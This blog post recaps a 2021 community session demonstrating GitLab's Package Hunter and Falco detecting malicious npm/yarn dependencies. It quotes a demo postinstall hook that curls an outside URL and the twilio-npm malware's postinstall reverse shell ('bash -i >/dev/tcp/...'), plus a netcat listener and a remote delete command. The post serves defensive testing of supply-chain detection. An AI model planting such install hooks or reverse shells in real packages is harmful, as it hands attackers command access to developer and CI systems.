---
Title: "43. #EveryoneCanContribute cafe: More Package Dependency Hunting with GitLab"
Date: 2021-08-18
Aliases: []
Tags: ["security","falco","cloudnative","gitlab","package-hunter"]
Categories: ["Community"]
Authors: ["dnsmichi"]
Featuredimage: "/media/2020/01/01/unikernel.png"
mermaid: true
---

[Michael Friedrich](https://twitter.com/dnsmichi) starts with an introduction to Package Hunter. [Niclas Mietz](https://twitter.com/solidnerd) dives into the cloud provisioned Package Hunter instance, and how to test malicious dependencies. [Dennis Appelt](https://twitter.com/dennisappelt) chimes in to help. 

### Recording

Enjoy the session! 🦊  

{{< youtube vsXDJ0en650 >}}

<br>

### Highlights

The cafe starts with quick introduction and recap of [last week's session with Falco](/post/2021-08-11-cafe-42-falco-gitlab-package-hunter/) and how Package Hunter uses it under the hood. The [slidedeck](https://docs.google.com/presentation/d/1biVRpHGBeHJvUeeySOrPAW8qFmls-EvWEj9_JVHVnuw/edit) provides more insights into the workflows.

We've then inspected the Terraform module for provisioning a VM in Hetzner Cloud, which mimics the same installation process as the local [Vagrantfile](https://gitlab.com/gitlab-org/security-products/package-hunter/-/blob/main/Vagrantfile) for Package Hunter. The server needs to be started in foreground:

```
NODE_ENV=development DEBUG=pkgs* node src/server.js
```

After starting the Package Hunter server, we tried the first malicious package upload with [mal-yarn](https://gitlab.com/everyonecancontribute/security/mal-yarn). It uses a specifically crafted `postinstall` script which tries to curl an outbound URL.

```
{
  "name": "mal-yarn",
  "version": "1.0.0",
  "main": "index.js",
  "license": "MIT",
  "scripts": {
    "postinstall": "curl https://everyonecancontribute.cafe"
  }
}
```

The tarball upload then triggered an alert in Package Hunter.

```
$ wget https://gitlab.com/everyonecancontribute/security/mal-yarn/-/archive/main/mal-yarn-main.tar.gz
$ curl --user 'dev:dev' -v -H 'Content-Type: application/octet-stream' --data-binary @mal-yarn-main.tar.gz http://localhost:3000/monitor/project/yarn
```

From there, we went to uploading a tarball of the [gitlab-org/gitlab project](https://gitlab.com/gitlab-org/gitlab). The Package Hunter output unveiled spawning many containers where the dependencies are installed. 

```
$ wget https://gitlab.com/gitlab-org/gitlab/-/archive/master/gitlab-master.tar.gz
$ curl --user 'dev:dev' -v -H 'Content-Type: application/octet-stream' --data-binary @gitlab-master.tar.gz http://localhost:3000/monitor/project/yarn
```

The report can be retrieved by querying the received ID on the Package Hunter server. `jq` helps to parse the result. 

```
$ curl --user 'dev:dev' http://localhost:3000/?id=322115d0-d96b-479b-b8f1-704bc4846025 | jq
```

The Package Hunter CLI polls and parses the Falco JSON report from the Package Hunter server and outputs the same format as the [GitLab Dependency Scanning](https://docs.gitlab.com/ee/user/application_security/dependency_scanning/) integration for MRs and dashbards. This magically works to take action without any extra patches.

```
$ DEBUG="*" package_hunter_HOST=http://localhost:3000 package_hunter_USER=dev package_hunter_PASS=dev node cli.js analyze gitlab-master.tar.gz --format=gitlab

$ cat gl-dependency-scanning-report.json | jq
```

In the last example, we used the specifically crafted [twilio-npm package](https://blog.sonatype.com/twilio-npm-is-brandjacking-malware-in-disguise) which opens a reverse shell where an attacker can send commands into. This happens in a similar fashion inside the `package.json` file.

```
"postinstall": "echo 'ASDF postinstall'; bash -c \"bash -i >/dev/tcp/116.203.139.79/8080 2>&1 0>&1\""
```

In a second terminal, the netcat commands needs listen for connections, and keep it open once received. Then an attacker can send commands to the remote server, in this case the Docker container which tests the package dependency installation.

```
$ nc -lkv 116.203.139.79 8080
```

The package was uploaded again, now spawning a connection to the nc command.

```
$ curl --user 'dev:dev' -v -H 'Content-Type: application/octet-stream' --data-binary @package.tar.gz http://localhost:3000/monitor/project/yarn
```

To simulate malicious intent, the package.json was deleted.

```
$ nc -lkv 116.203.139.79 8080

rm package.json
```

Inspecting the running Docker container proved exactly that.

```
$ docker exec -it 96df81b3cf0b /bin/bash
$ ls
```

Imagine this package passes your supply chain and lands in production, with read-write access for attackers. This is where Package Hunter and Falco help prevent this inside CI/CD pipelines, amongst other security scans like SAST, containers, dependencies, secrets, etc. 

This check is integrated into the [GitLab project's CI/CD pipeline configuration](https://gitlab.com/gitlab-org/gitlab/-/blob/master/.gitlab/ci/reports.gitlab-ci.yml#L104) for yarn and bundler. Future ideas are Golang, etc. - share your ideas in the [Package Hunter project](https://gitlab.com/gitlab-org/security-products/package-hunter)! 🦊 

### Insights

- Package Hunter
  - [Blog](https://about.gitlab.com/blog/2021/07/23/announcing-package-hunter/)
  - [Slides](https://docs.google.com/presentation/d/1biVRpHGBeHJvUeeySOrPAW8qFmls-EvWEj9_JVHVnuw/edit)
  - [Server docs](https://gitlab.com/gitlab-org/security-products/package-hunter/)
  - [CLI docs](https://gitlab.com/gitlab-org/security-products/package-hunter-cli)
  - [CI/CD template from gitlab-org/gitlab](https://gitlab.com/gitlab-org/gitlab/-/blob/master/.gitlab/ci/reports.gitlab-ci.yml#L104)
- Repositories   
  - [Yarn malware demo project](https://gitlab.com/everyonecancontribute/security/mal-yarn)
  - [Terraform Module for Hetzner Cloud provisioning](https://gitlab.com/everyonecancontribute/security/terraform-hcloud-packagehunter-host)
- Falco
  - [Project](https://falco.org/)  
- [Twitter thread](https://twitter.com/dnsmichi/status/1428029373303644164)


